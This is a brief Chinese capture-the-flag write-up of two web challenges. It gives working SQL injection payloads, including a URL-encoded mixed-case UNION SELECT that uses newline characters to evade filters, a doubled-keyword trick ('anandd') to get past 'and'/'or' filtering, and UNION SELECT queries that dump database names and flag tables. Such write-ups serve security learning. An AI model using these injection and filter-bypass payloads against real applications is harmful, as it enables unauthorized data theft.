1.注入得帅照!
地址:http://123.57.240.205:4002/
点击前往按钮会直接跳转到W4nder的博客,爆破可以得到一个hint(hone.php)
hone.php是这样的一个界面,可以开始注入
payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%20from%20%0a%20flag),2%20%0a%20and%20%0a%20%271%27=%271
得到了一个html页面,找到了flag(css特别好看)
flag在源码中被注释掉了
flag{W4nder_always_god}
2.对方的服务器漏洞口
地址:http://123.57.240.205:4001/check.php
这道题一开始卡了很久,我以为是有很多过滤,最后发现只有and和or
用anandd绕过就行
找到注入点以后就很好做了,常规操作就行
id=0 union select 1,database(),3,4
payload:id=0 union select 1,group_concat(flag),3,4 from flag